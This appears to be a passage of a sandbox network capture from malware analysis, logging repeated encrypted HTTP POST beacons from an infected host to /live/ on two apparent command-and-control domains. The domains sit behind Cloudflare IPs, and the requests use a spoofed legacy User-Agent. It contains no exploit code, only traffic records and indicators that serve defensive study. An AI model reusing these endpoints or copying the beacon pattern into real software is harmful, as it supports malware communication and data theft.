2024-04-26 21:24:20 UTC	227	OUT	POST /live/ HTTP/1.1 Accept: / Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) Host: pewwhranet.com Content-Length: 180 Cache-Control: no-cache
2024-04-26 21:24:20 UTC	180	OUT	Data Raw: 59 6a 4f 65 45 79 69 4d 6b 33 52 76 42 38 6e 52 41 75 53 4f 42 61 5a 63 79 73 69 76 55 6b 73 54 35 78 33 48 39 39 57 70 4c 57 4b 4f 56 62 6e 78 36 79 49 70 77 64 48 78 6d 72 42 38 6d 58 4b 6e 63 70 43 51 45 61 6c 61 64 64 38 43 68 5a 4c 48 4b 66 65 70 70 63 54 71 50 6d 44 47 66 68 76 49 74 7a 64 69 48 31 44 49 4a 6a 4a 33 6f 4c 41 55 39 55 73 4d 47 77 59 55 77 78 69 54 6f 52 70 35 44 5a 4f 37 2f 39 66 6a 48 57 47 47 50 42 6a 6b 4f 75 65 34 42 48 61 30 39 56 39 2b 39 4b 58 38 2f 61 6d 73 64 31 42 57 32 69 30 71 70 6b 48 59 45 48 6b 3d Data Ascii: YjOeEyiMk3RvB8nRAuSOBaZcysivUksT5x3H99WpLWKOVbnx6yIpwdHxmrB8mXKncpCQEaladd8ChZLHKfeppcTqPmDGfhvItzdiH1DIJjJ3oLAU9UsMGwYUwxiToRp5DZO7/9fjHWGGPBjkOue4BHa09V9+9KX8/amsd1BW2i0qpkHYEHk=

Session ID	Source IP	Source Port	Destination IP	Destination Port
91	192.168.2.4	49841	104.21.59.82	443

Timestamp	Bytes transferred	Direction	Data
2024-04-26 21:24:24 UTC	227	OUT	POST /live/ HTTP/1.1 Accept: / Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) Host: grizmotras.com Content-Length: 180 Cache-Control: no-cache
2024-04-26 21:24:24 UTC	180	OUT	Data Raw: 59 6a 4f 65 45 79 69 4d 6b 33 52 76 42 38 6e 52 41 75 53 4f 42 61 5a 63 79 73 69 76 55 6b 73 54 35 78 33 48 39 39 57 70 4c 57 4b 4f 56 62 6e 78 36 79 49 70 77 64 48 78 6d 72 42 38 6d 58 4b 6e 63 70 43 51 45 61 6c 61 64 64 38 43 68 5a 4c 48 4b 66 65 70 70 63 54 71 50 6d 44 47 66 68 76 49 74 7a 64 69 48 31 44 49 4a 6a 4a 33 6f 4c 41 55 39 55 73 4d 47 77 59 55 77 78 69 54 6f 52 70 35 44 5a 4f 37 2f 39 66 6a 48 57 47 47 50 42 6a 6b 4f 75 65 34 42 48 61 30 39 56 39 2b 39 4b 58 38 36 72 36 79 65 6c 56 4c 7a 7a 45 75 6f 55 48 59 45 48 6b 3d Data Ascii: YjOeEyiMk3RvB8nRAuSOBaZcysivUksT5x3H99WpLWKOVbnx6yIpwdHxmrB8mXKncpCQEaladd8ChZLHKfeppcTqPmDGfhvItzdiH1DIJjJ3oLAU9UsMGwYUwxiToRp5DZO7/9fjHWGGPBjkOue4BHa09V9+9KX86r6yelVLzzEuoUHYEHk=
2024-04-26 21:24:28 UTC	580	IN	HTTP/1.1 200 OK Date: Fri, 26 Apr 2024 21:24:28 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oizfd505k0vdj7iwygtrlnYrhQ%2BkODxxL4usnrZftgkiv6ZZ%2BNUBGa707GLDoQDQlvikUh3eMH%2BqiU7oEKTRuB2Ehfh7ydc5%2F%2BF4PXcEIIDfsVyIlx2M9HGWn0u2iCGXkQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87a9a3b64ac2572b-MIA alt-svc: h3=":443"; ma=86400
2024-04-26 21:24:28 UTC	118	IN	Data Raw: 37 30 0d 0a 51 68 43 75 50 41 36 38 73 77 56 57 50 37 72 33 4e 38 65 58 43 4f 73 53 32 63 6d 32 52 55 78 34 6a 6a 6a 77 71 35 7a 38 41 43 58 4c 42 76 2b 63 79 6e 6b 43 33 6f 36 71 32 35 4d 52 31 6a 36 77 45 2b 33 30 53 2f 64 56 49 4a 31 51 6c 4a 4f 65 62 75 58 6f 35 73 62 75 4d 32 44 4a 63 52 50 5a 70 44 35 69 48 42 72 58 61 53 4e 67 34 4d 68 75 0d 0a Data Ascii: 70QhCuPA68swVWP7r3N8eXCOsS2cm2RUx4jjjwq5z8ACXLBv+cynkC3o6q25MR1j6wE+30S/dVIJ1QlJOebuXo5sbuM2DJcRPZpD5iHBrXaSNg4Mhu
2024-04-26 21:24:28 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
92	192.168.2.4	49842	104.21.59.82	443

Timestamp	Bytes transferred	Direction	Data
2024-04-26 21:24:28 UTC	227	OUT	POST /live/ HTTP/1.1 Accept: / Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) Host: grizmotras.com Content-Length: 180 Cache-Control: no-cache
2024-04-26 21:24:28 UTC	180	OUT	Data Raw: 59 6a 4f 65 45 79 69 4d 6b 33 52 76 42 73 6e 52 41 75 53 4f 42 61 5a 63 79 73 69 76 55 6b 73 54 35 78 33 48 39 39 57 70 4c 57 4b 4f 56 62 6e 78 36 79 49 70 77 64 48 78 6d 72 42 38 6d 58 4b 6e 63 70 43 51 45 61 6c 61 64 64 38 43 68 5a 4c 48 4b 66 65 70 70 63 54 71 50 6d 44 47 66 68 76 49 74 7a 64 69 48 31 44 49 4a 6a 4a 33 6f 4c 41 55 39 55 73 4d 47 77 59 55 77 78 69 54 6f 52 70 35 44 5a 4f 37 2f 39 66 6a 48 57 47 47 50 42 6a 6b 4f 75 65 34 42 48 61 30 39 56 39 2b 39 4b 58 38 36 72 36 79 65 6c 56 4c 7a 7a 45 75 6f 55 48 59 45 48 6b 3d Data Ascii: YjOeEyiMk3RvBsnRAuSOBaZcysivUksT5x3H99WpLWKOVbnx6yIpwdHxmrB8mXKncpCQEaladd8ChZLHKfeppcTqPmDGfhvItzdiH1DIJjJ3oLAU9UsMGwYUwxiToRp5DZO7/9fjHWGGPBjkOue4BHa09V9+9KX86r6yelVLzzEuoUHYEHk=

Session ID	Source IP	Source Port	Destination IP	Destination Port
93	192.168.2.4	49843	172.67.197.34	443

Timestamp	Bytes transferred	Direction	Data
2024-04-26 21:24:32 UTC	227	OUT	POST /live/ HTTP/1.1 Accept: / Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) Host: pewwhranet.com Content-Length: 180 Cache-Control: no-cache
2024-04-26 21:24:32 UTC	180	OUT	Data Raw: 59 6a 4f 65 45 79 69 4d 6b 33 52 76 42 73 6e 52 41 75 53 4f 42 61 5a 63 79 73 69 76 55 6b 73 54 35 78 33 48 39 39 57 70 4c 57 4b 4f 56 62 6e 78 36 79 49 70 77 64 48 78 6d 72 42 38 6d 58 4b 6e 63 70 43 51 45 61 6c 61 64 64 38 43 68 5a 4c 48 4b 66 65 70 70 63 54 71 50 6d 44 47 66 68 76 49 74 7a 64 69 48 31 44 49 4a 6a 4a 33 6f 4c 41 55 39 55 73 4d 47 77 59 55 77 78 69 54 6f 52 70 35 44 5a 4f 37 2f 39 66 6a 48 57 47 47 50 42 6a 6b 4f 75 65 34 42 48 61 30 39 56 39 2b 39 4b 58 38 2f 61 6d 73 64 31 42 57 32 69 30 71 70 6b 48 59 45 48 6b 3d Data Ascii: YjOeEyiMk3RvBsnRAuSOBaZcysivUksT5x3H99WpLWKOVbnx6yIpwdHxmrB8mXKncpCQEaladd8ChZLHKfeppcTqPmDGfhvItzdiH1DIJjJ3oLAU9UsMGwYUwxiToRp5DZO7/9fjHWGGPBjkOue4BHa09V9+9KX8/amsd1BW2i0qpkHYEHk=

Session ID	Source IP	Source Port	Destination IP	Destination Port
94	192.168.2.4	49844	104.21.59.82	443

Timestamp	Bytes transferred	Direction	Data
2024-04-26 21:24:37 UTC	227	OUT	POST /live/ HTTP/1.1 Accept: / Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) Host: grizmotras.com Content-Length: 180 Cache-Control: no-cache
2024-04-26 21:24:37 UTC	180	OUT	Data Raw: 59 6a 4f 65 45 79 69 4d 6b 33 52 76 42 73 6e 52 41 75 53 4f 42 61 5a 63 79 73 69 76 55 6b 73 54 35 78 33 48 39 39 57 70 4c 57 4b 4f 56 62 6e 78 36 79 49 70 77 64 48 78 6d 72 42 38 6d 58 4b 6e 63 70 43 51 45 61 6c 61 64 64 38 43 68 5a 4c 48 4b 66 65 70 70 63 54 71 50 6d 44 47 66 68 76 49 74 7a 64 69 48 31 44 49 4a 6a 4a 33 6f 4c 41 55 39 55 73 4d 47 77 59 55 77 78 69 54 6f 52 70 35 44 5a 4f 37 2f 39 66 6a 48 57 47 47 50 42 6a 6b 4f 75 65 34 42 48 61 30 39 56 39 2b 39 4b 58 38 36 72 36 79 65 6c 56 4c 7a 7a 45 75 6f 55 48 59 45 48 6b 3d Data Ascii: YjOeEyiMk3RvBsnRAuSOBaZcysivUksT5x3H99WpLWKOVbnx6yIpwdHxmrB8mXKncpCQEaladd8ChZLHKfeppcTqPmDGfhvItzdiH1DIJjJ3oLAU9UsMGwYUwxiToRp5DZO7/9fjHWGGPBjkOue4BHa09V9+9KX86r6yelVLzzEuoUHYEHk=

Session ID	Source IP	Source Port	Destination IP	Destination Port
95	192.168.2.4	49845	172.67.197.34	443

Timestamp	Bytes transferred	Direction	Data
2024-04-26 21:24:41 UTC	227	OUT	POST /live/ HTTP/1.1 Accept: / Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) Host: pewwhranet.com Content-Length: 180 Cache-Control: no-cache
2024-04-26 21:24:41 UTC	180	OUT	Data Raw: 59 6a 4f 65 45 79 69 4d 6b 33 52 76 42 73 6e 52 41 75 53 4f 42 61 5a 63 79 73 69 76 55 6b 73 54 35 78 33 48 39 39 57 70 4c 57 4b 4f 56 62 6e 78 36 79 49 70 77 64 48 78 6d 72 42 38 6d 58 4b 6e 63 70 43 51 45 61 6c 61 64 64 38 43 68 5a 4c 48 4b 66 65 70 70 63 54 71 50 6d 44 47 66 68 76 49 74 7a 64 69 48 31 44 49 4a 6a 4a 33 6f 4c 41 55 39 55 73 4d 47 77 59 55 77 78 69 54 6f 52 70 35 44 5a 4f 37 2f 39 66 6a 48 57 47 47 50 42 6a 6b 4f 75 65 34 42 48 61 30 39 56 39 2b 39 4b 58 38 2f 61 6d 73 64 31 42 57 32 69 30 71 70 6b 48 59 45 48 6b 3d Data Ascii: YjOeEyiMk3RvBsnRAuSOBaZcysivUksT5x3H99WpLWKOVbnx6yIpwdHxmrB8mXKncpCQEaladd8ChZLHKfeppcTqPmDGfhvItzdiH1DIJjJ3oLAU9UsMGwYUwxiToRp5DZO7/9fjHWGGPBjkOue4BHa09V9+9KX8/amsd1BW2i0qpkHYEHk=

Session ID	Source IP	Source Port	Destination IP	Destination Port
96	192.168.2.4	49846	104.21.59.82	443

Timestamp	Bytes transferred	Direction	Data
2024-04-26 21:24:45 UTC	227	OUT	POST /live/ HTTP/1.1 Accept: / Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) Host: grizmotras.com Content-Length: 180 Cache-Control: no-cache
2024-04-26 21:24:45 UTC	180	OUT	Data Raw: 59 6a 4f 65 45 79 69 4d 6b 33 52 76 42 73 6e 52 41 75 53 4f 42 61 5a 63 79 73 69 76 55 6b 73 54 35 78 33 48 39 39 57 70 4c 57 4b 4f 56 62 6e 78 36 79 49 70 77 64 48 78 6d 72 42 38 6d 58 4b 6e 63 70 43 51 45 61 6c 61 64 64 38 43 68 5a 4c 48 4b 66 65 70 70 63 54 71 50 6d 44 47 66 68 76 49 74 7a 64 69 48 31 44 49 4a 6a 4a 33 6f 4c 41 55 39 55 73 4d 47 77 59 55 77 78 69 54 6f 52 70 35 44 5a 4f 37 2f 39 66 6a 48 57 47 47 50 42 6a 6b 4f 75 65 34 42 48 61 30 39 56 39 2b 39 4b 58 38 36 72 36 79 65 6c 56 4c 7a 7a 45 75 6f 55 48 59 45 48 6b 3d Data Ascii: YjOeEyiMk3RvBsnRAuSOBaZcysivUksT5x3H99WpLWKOVbnx6yIpwdHxmrB8mXKncpCQEaladd8ChZLHKfeppcTqPmDGfhvItzdiH1DIJjJ3oLAU9UsMGwYUwxiToRp5DZO7/9fjHWGGPBjkOue4BHa09V9+9KX86r6yelVLzzEuoUHYEHk=

Session ID	Source IP	Source Port	Destination IP	Destination Port
97	192.168.2.4	49847	172.67.197.34	443

Timestamp	Bytes transferred	Direction	Data
2024-04-26 21:24:50 UTC	227	OUT	POST /live/ HTTP/1.1 Accept: / Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) Host: pewwhranet.com Content-Length: 180 Cache-Control: no-cache
2024-04-26 21:24:50 UTC	180	OUT	Data Raw: 59 6a 4f 65 45 79 69 4d 6b 33 52 76 42 73 6e 52 41 75 53 4f 42 61 5a 63 79 73 69 76 55 6b 73 54 35 78 33 48 39 39 57 70 4c 57 4b 4f 56 62 6e 78 36 79 49 70 77 64 48 78 6d 72 42 38 6d 58 4b 6e 63 70 43 51 45 61 6c 61 64 64 38 43 68 5a 4c 48 4b 66 65 70 70 63 54 71 50 6d 44 47 66 68 76 49 74 7a 64 69 48 31 44 49 4a 6a 4a 33 6f 4c 41 55 39 55 73 4d 47 77 59 55 77 78 69 54 6f 52 70 35 44 5a 4f 37 2f 39 66 6a 48 57 47 47 50 42 6a 6b 4f 75 65 34 42 48 61 30 39 56 39 2b 39 4b 58 38 2f 61 6d 73 64 31 42 57 32 69 30 71 70 6b 48 59 45 48 6b 3d Data Ascii: YjOeEyiMk3RvBsnRAuSOBaZcysivUksT5x3H99WpLWKOVbnx6yIpwdHxmrB8mXKncpCQEaladd8ChZLHKfeppcTqPmDGfhvItzdiH1DIJjJ3oLAU9UsMGwYUwxiToRp5DZO7/9fjHWGGPBjkOue4BHa09V9+9KX8/amsd1BW2i0qpkHYEHk=

Session ID	Source IP	Source Port	Destination IP	Destination Port
98	192.168.2.4	49848	104.21.59.82	443

Timestamp	Bytes transferred	Direction	Data
2024-04-26 21:24:54 UTC	227	OUT	POST /live/ HTTP/1.1 Accept: / Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) Host: grizmotras.com Content-Length: 180 Cache-Control: no-cache
2024-04-26 21:24:54 UTC	180	OUT	Data Raw: 59 6a 4f 65 45 79 69 4d 6b 33 52 76 42 73 6e 52 41 75 53 4f 42 61 5a 63 79 73 69 76 55 6b 73 54 35 78 33 48 39 39 57 70 4c 57 4b 4f 56 62 6e 78 36 79 49 70 77 64 48 78 6d 72 42 38 6d 58 4b 6e 63 70 43 51 45 61 6c 61 64 64 38 43 68 5a 4c 48 4b 66 65 70 70 63 54 71 50 6d 44 47 66 68 76 49 74 7a 64 69 48 31 44 49 4a 6a 4a 33 6f 4c 41 55 39 55 73 4d 47 77 59 55 77 78 69 54 6f 52 70 35 44 5a 4f 37 2f 39 66 6a 48 57 47 47 50 42 6a 6b 4f 75 65 34 42 48 61 30 39 56 39 2b 39 4b 58 38 36 72 36 79 65 6c 56 4c 7a 7a 45 75 6f 55 48 59 45 48 6b 3d Data Ascii: YjOeEyiMk3RvBsnRAuSOBaZcysivUksT5x3H99WpLWKOVbnx6yIpwdHxmrB8mXKncpCQEaladd8ChZLHKfeppcTqPmDGfhvItzdiH1DIJjJ3oLAU9UsMGwYUwxiToRp5DZO7/9fjHWGGPBjkOue4BHa09V9+9KX86r6yelVLzzEuoUHYEHk=

Session ID	Source IP	Source Port	Destination IP	Destination Port
99	192.168.2.4	49849	172.67.197.34	443

Timestamp	Bytes transferred	Direction	Data
2024-04-26 21:24:58 UTC	227	OUT	POST /live/ HTTP/1.1 Accept: / Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) Host: pewwhranet.com Content-Length: 180 Cache-Control: no-cache
2024-04-26 21:24:58 UTC	180	OUT	Data Raw: 59 6a 4f 65 45 79 69 4d 6b 33 52 76 42 73 6e 52 41 75 53 4f 42 61 5a 63 79 73 69 76 55 6b 73 54 35 78 33 48 39 39 57 70 4c 57 4b 4f 56 62 6e 78 36 79 49 70 77 64 48 78 6d 72 42 38 6d 58 4b 6e 63 70 43 51 45 61 6c 61 64 64 38 43 68 5a 4c 48 4b 66 65 70 70 63 54 71 50 6d 44 47 66 68 76 49 74 7a 64 69 48 31 44 49 4a 6a 4a 33 6f 4c 41 55 39 55 73 4d 47 77 59 55 77 78 69 54 6f 52 70 35 44 5a 4f 37 2f 39 66 6a 48 57 47 47 50 42 6a 6b 4f 75 65 34 42 48 61 30 39 56 39 2b 39 4b 58 38 2f 61 6d 73 64 31 42 57 32 69 30 71 70 6b 48 59 45 48 6b 3d Data Ascii: YjOeEyiMk3RvBsnRAuSOBaZcysivUksT5x3H99WpLWKOVbnx6yIpwdHxmrB8mXKncpCQEaladd8ChZLHKfeppcTqPmDGfhvItzdiH1DIJjJ3oLAU9UsMGwYUwxiToRp5DZO7/9fjHWGGPBjkOue4BHa09V9+9KX8/amsd1BW2i0qpkHYEHk=

Session ID	Source IP	Source Port	Destination IP	Destination Port
100	192.168.2.4	49850	104.21.59.82	443

Timestamp	Bytes transferred	Direction	Data
2024-04-26 21:25:03 UTC	227	OUT	POST /live/ HTTP/1.1 Accept: / Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) Host: grizmotras.com Content-Length: 180 Cache-Control: no-cache
2024-04-26 21:25:03 UTC	180	OUT	Data Raw: 59 6a 4f 65 45 79 69 4d 6b 33 52 76 42 73 6e 52 41 75 53 4f 42 61 5a 63 79 73 69 76 55 6b 73 54 35 78 33 48 39 39 57 70 4c 57 4b 4f 56 62 6e 78 36 79 49 70 77 64 48 78 6d 72 42 38 6d 58 4b 6e 63 70 43 51 45 61 6c 61 64 64 38 43 68 5a 4c 48 4b 66 65 70 70 63 54 71 50 6d 44 47 66 68 76 49 74 7a 64 69 48 31 44 49 4a 6a 4a 33 6f 4c 41 55 39 55 73 4d 47 77 59 55 77 78 69 54 6f 52 70 35 44 5a 4f 37 2f 39 66 6a 48 57 47 47 50 42 6a 6b 4f 75 65 34 42 48 61 30 39 56 39 2b 39 4b 58 38 36 72 36 79 65 6c 56 4c 7a 7a 45 75 6f 55 48 59 45 48 6b 3d Data Ascii: YjOeEyiMk3RvBsnRAuSOBaZcysivUksT5x3H99WpLWKOVbnx6yIpwdHxmrB8mXKncpCQEaladd8ChZLHKfeppcTqPmDGfhvItzdiH1DIJjJ3oLAU9UsMGwYUwxiToRp5DZO7/9fjHWGGPBjkOue4BHa09V9+9KX86r6yelVLzzEuoUHYEHk=

Session ID	Source IP	Source Port	Destination IP	Destination Port
101	192.168.2.4	49851	172.67.197.34	443

Timestamp	Bytes transferred	Direction	Data
2024-04-26 21:25:07 UTC	227	OUT	POST /live/ HTTP/1.1 Accept: / Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) Host: pewwhranet.com Content-Length: 180 Cache-Control: no-cache
2024-04-26 21:25:07 UTC	180	OUT	Data Raw: 59 6a 4f 65 45 79 69 4d 6b 33 52 76 42 73 6e 52 41 75 53 4f 42 61 5a 63 79 73 69 76 55 6b 73 54 35 78 33 48 39 39 57 70 4c 57 4b 4f 56 62 6e 78 36 79 49 70 77 64 48 78 6d 72 42 38 6d 58 4b 6e 63 70 43 51 45 61 6c 61 64 64 38 43 68 5a 4c 48 4b 66 65 70 70 63 54 71 50 6d 44 47 66 68 76 49 74 7a 64 69 48 31 44 49 4a 6a 4a 33 6f 4c 41 55 39 55 73 4d 47 77 59 55 77 78 69 54 6f 52 70 35 44 5a 4f 37 2f 39 66 6a 48 57 47 47 50 42 6a 6b 4f 75 65 34 42 48 61 30 39 56 39 2b 39 4b 58 38 2f 61 6d 73 64 31 42 57 32 69 30 71 70 6b 48 59 45 48 6b 3d Data Ascii: YjOeEyiMk3RvBsnRAuSOBaZcysivUksT5x3H99WpLWKOVbnx6yIpwdHxmrB8mXKncpCQEaladd8ChZLHKfeppcTqPmDGfhvItzdiH1DIJjJ3oLAU9UsMGwYUwxiToRp5DZO7/9fjHWGGPBjkOue4BHa09V9+9KX8/amsd1BW2i0qpkHYEHk=

Session ID	Source IP	Source Port	Destination IP	Destination Port
102	192.168.2.4	49852	104.21.59.82	443

Timestamp	Bytes transferred	Direction	Data
2024-04-26 21:25:11 UTC	227	OUT	POST /live/ HTTP/1.1 Accept: / Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) Host: grizmotras.com Content-Length: 180 Cache-Control: no-cache
2024-04-26 21:25:11 UTC	180	OUT	Data Raw: 59 6a 4f 65 45 79 69 4d 6b 33 52 76 42 73 6e 52 41 75 53 4f 42 61 5a 63 79 73 69 76 55 6b 73 54 35 78 33 48 39 39 57 70 4c 57 4b 4f 56 62 6e 78 36 79 49 70 77 64 48 78 6d 72 42 38 6d 58 4b 6e 63 70 43 51 45 61 6c 61 64 64 38 43 68 5a 4c 48 4b 66 65 70 70 63 54 71 50 6d 44 47 66 68 76 49 74 7a 64 69 48 31 44 49 4a 6a 4a 33 6f 4c 41 55 39 55 73 4d 47 77 59 55 77 78 69 54 6f 52 70 35 44 5a 4f 37 2f 39 66 6a 48 57 47 47 50 42 6a 6b 4f 75 65 34 42 48 61 30 39 56 39 2b 39 4b 58 38 36 72 36 79 65 6c 56 4c 7a 7a 45 75 6f 55 48 59 45 48 6b 3d Data Ascii: YjOeEyiMk3RvBsnRAuSOBaZcysivUksT5x3H99WpLWKOVbnx6yIpwdHxmrB8mXKncpCQEaladd8ChZLHKfeppcTqPmDGfhvItzdiH1DIJjJ3oLAU9UsMGwYUwxiToRp5DZO7/9fjHWGGPBjkOue4BHa09V9+9KX86r6yelVLzzEuoUHYEHk=

Session ID	Source IP	Source Port	Destination IP	Destination Port
103	192.168.2.4	49853	172.67.197.34	443

Timestamp	Bytes transferred	Direction	Data
2024-04-26 21:25:15 UTC	227	OUT	POST /live/ HTTP/1.1 Accept: / Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) Host: pewwhranet.com Content-Length: 180 Cache-Control: no-cache
2024-04-26 21:25:15 UTC	180	OUT	Data Raw: 59 6a 4f 65 45 79 69 4d 6b 33 52 76 42 73 6e 52 41 75 53 4f 42 61 5a 63 79 73 69 76 55 6b 73 54 35 78 33 48 39 39 57 70 4c 57 4b 4f 56 62 6e 78 36 79 49 70 77 64 48 78 6d 72 42 38 6d 58 4b 6e 63 70 43 51 45 61 6c 61 64 64 38 43 68 5a 4c 48 4b 66 65 70 70 63 54 71 50 6d 44 47 66 68 76 49 74 7a 64 69 48 31 44 49 4a 6a 4a 33 6f 4c 41 55 39 55 73 4d 47 77 59 55 77 78 69 54 6f 52 70 35 44 5a 4f 37 2f 39 66 6a 48 57 47 47 50 42 6a 6b 4f 75 65 34 42 48 61 30 39 56 39 2b 39 4b 58 38 2f 61 6d 73 64 31 42 57 32 69 30 71 70 6b 48 59 45 48 6b 3d Data Ascii: YjOeEyiMk3RvBsnRAuSOBaZcysivUksT5x3H99WpLWKOVbnx6yIpwdHxmrB8mXKncpCQEaladd8ChZLHKfeppcTqPmDGfhvItzdiH1DIJjJ3oLAU9UsMGwYUwxiToRp5DZO7/9fjHWGGPBjkOue4BHa09V9+9KX8/amsd1BW2i0qpkHYEHk=

Session ID	Source IP	Source Port	Destination IP	Destination Port
104	192.168.2.4	49854	104.21.59.82	443

Timestamp	Bytes transferred	Direction	Data
2024-04-26 21:25:20 UTC	227	OUT	POST /live/ HTTP/1.1 Accept: / Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) Host: grizmotras.com Content-Length: 180 Cache-Control: no-cache
2024-04-26 21:25:20 UTC	180	OUT	Data Raw: 59 6a 4f 65 45 79 69 4d 6b 33 52 76 42 73 6e 52 41 75 53 4f 42 61 5a 63 79 73 69 76 55 6b 73 54 35 78 33 48 39 39 57 70 4c 57 4b 4f 56 62 6e 78 36 79 49 70 77 64 48 78 6d 72 42 38 6d 58 4b 6e 63 70 43 51 45 61 6c 61 64 64 38 43 68 5a 4c 48 4b 66 65 70 70 63 54 71 50 6d 44 47 66 68 76 49 74 7a 64 69 48 31 44 49 4a 6a 4a 33 6f 4c 41 55 39 55 73 4d 47 77 59 55 77 78 69 54 6f 52 70 35 44 5a 4f 37 2f 39 66 6a 48 57 47 47 50 42 6a 6b 4f 75 65 34 42 48 61 30 39 56 39 2b 39 4b 58 38 36 72 36 79 65 6c 56 4c 7a 7a 45 75 6f 55 48 59 45 48 6b 3d Data Ascii: YjOeEyiMk3RvBsnRAuSOBaZcysivUksT5x3H99WpLWKOVbnx6yIpwdHxmrB8mXKncpCQEaladd8ChZLHKfeppcTqPmDGfhvItzdiH1DIJjJ3oLAU9UsMGwYUwxiToRp5DZO7/9fjHWGGPBjkOue4BHa09V9+9KX86r6yelVLzzEuoUHYEHk=

Session ID	Source IP	Source Port	Destination IP	Destination Port
105	192.168.2.4	49855	172.67.197.34	443

Timestamp	Bytes transferred	Direction	Data
2024-04-26 21:25:21 UTC	227	OUT	POST /live/ HTTP/1.1 Accept: / Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) Host: pewwhranet.com Content-Length: 180 Cache-Control: no-cache
2024-04-26 21:25:21 UTC	180	OUT	Data Raw: 59 6a 4f 65 45 79 69 4d 6b 33 52 76 42 73 6e 52 41 75 53 4f 42 61 5a 63 79 73 69 76 55 6b 73 54 35 78 33 48 39 39 57 70 4c 57 4b 4f 56 62 6e 78 36 79 49 70 77 64 48 78 6d 72 42 38 6d 58 4b 6e 63 70 43 51 45 61 6c 61 64 64 38 43 68 5a 4c 48 4b 66 65 70 70 63 54 71 50 6d 44 47 66 68 76 49 74 7a 64 69 48 31 44 49 4a 6a 4a 33 6f 4c 41 55 39 55 73 4d 47 77 59 55 77 78 69 54 6f 52 70 35 44 5a 4f 37 2f 39 66 6a 48 57 47 47 50 42 6a 6b 4f 75 65 34 42 48 61 30 39 56 39 2b 39 4b 58 38 2f 61 6d 73 64 31 42 57 32 69 30 71 70 6b 48 59 45 48 6b 3d Data Ascii: YjOeEyiMk3RvBsnRAuSOBaZcysivUksT5x3H99WpLWKOVbnx6yIpwdHxmrB8mXKncpCQEaladd8ChZLHKfeppcTqPmDGfhvItzdiH1DIJjJ3oLAU9UsMGwYUwxiToRp5DZO7/9fjHWGGPBjkOue4BHa09V9+9KX8/amsd1BW2i0qpkHYEHk=

Session ID	Source IP	Source Port	Destination IP	Destination Port
106	192.168.2.4	49856	104.21.59.82	443

Timestamp	Bytes transferred	Direction	Data
2024-04-26 21:25:25 UTC	227	OUT	POST /live/ HTTP/1.1 Accept: / Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) Host: grizmotras.com Content-Length: 180 Cache-Control: no-cache
2024-04-26 21:25:25 UTC	180	OUT	Data Raw: 59 6a 4f 65 45 79 69 4d 6b 33 52 76 42 73 6e 52 41 75 53 4f 42 61 5a 63 79 73 69 76 55 6b 73 54 35 78 33 48 39 39 57 70 4c 57 4b 4f 56 62 6e 78 36 79 49 70 77 64 48 78 6d 72 42 38 6d 58 4b 6e 63 70 43 51 45 61 6c 61 64 64 38 43 68 5a 4c 48 4b 66 65 70 70 63 54 71 50 6d 44 47 66 68 76 49 74 7a 64 69 48 31 44 49 4a 6a 4a 33 6f 4c 41 55 39 55 73 4d 47 77 59 55 77 78 69 54 6f 52 70 35 44 5a 4f 37 2f 39 66 6a 48 57 47 47 50 42 6a 6b 4f 75 65 34 42 48 61 30 39 56 39 2b 39 4b 58 38 36 72 36 79 65 6c 56 4c 7a 7a 45 75 6f 55 48 59 45 48 6b 3d Data Ascii: YjOeEyiMk3RvBsnRAuSOBaZcysivUksT5x3H99WpLWKOVbnx6yIpwdHxmrB8mXKncpCQEaladd8ChZLHKfeppcTqPmDGfhvItzdiH1DIJjJ3oLAU9UsMGwYUwxiToRp5DZO7/9fjHWGGPBjkOue4BHa09V9+9KX86r6yelVLzzEuoUHYEHk=

Session ID	Source IP	Source Port	Destination IP	Destination Port
107	192.168.2.4	49857	172.67.197.34	443

Timestamp	Bytes transferred	Direction	Data
2024-04-26 21:25:30 UTC	227	OUT	POST /live/ HTTP/1.1 Accept: / Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) Host: pewwhranet.com Content-Length: 180 Cache-Control: no-cache
